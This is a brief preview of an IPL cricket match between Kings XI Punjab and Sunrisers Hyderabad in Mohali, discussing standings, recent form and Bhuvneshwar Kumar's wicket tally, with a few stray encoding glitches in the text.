Kings XI Punjab return to their ‘real’ home ground home of Mohali to take on Sunrisers Hyderabad on Friday.
KXIP need points to start moving up the ladder. SRH need a win to stay close to the top two teams in the standings.
Glenn Maxwell’s side isn’t too comfortably placed, with just 3 wins from 7 matches and are placed in fifth spot; one short of where they would at least like to be at the end of the league format. SRH, on the other hand, are at the third spot and would love to consolidate.
The David Warner-led Hyderabad have won four out of eight games so far; and have shared the points in a rain-abandoned outing against Royal Challengers Bangalore.
In their most-recent outing, PunjabAdefeated the Gujarat Lions. However, Glenn Maxwellas side have had a four-day break since that win; and they will need to set things rolling and quickly switch into overdrive mode. The other challenge for KXIP is to quickly gauge and adapt to the conditions in Mohali; the team played their home matches in Indore prior to this and did fairly well; winning two of the three matches there.
Sunrisers Hyderabad clinched their first points on the road in their previous match; and that came through a washed-out encounter against Royal Challengers Bangalore. They haveAarguably been the best bowling side in the tournament. Bhuvneshwar Kumar going great with 16 wickets in the tournament already, SRH will have a clear edge tomorrow.
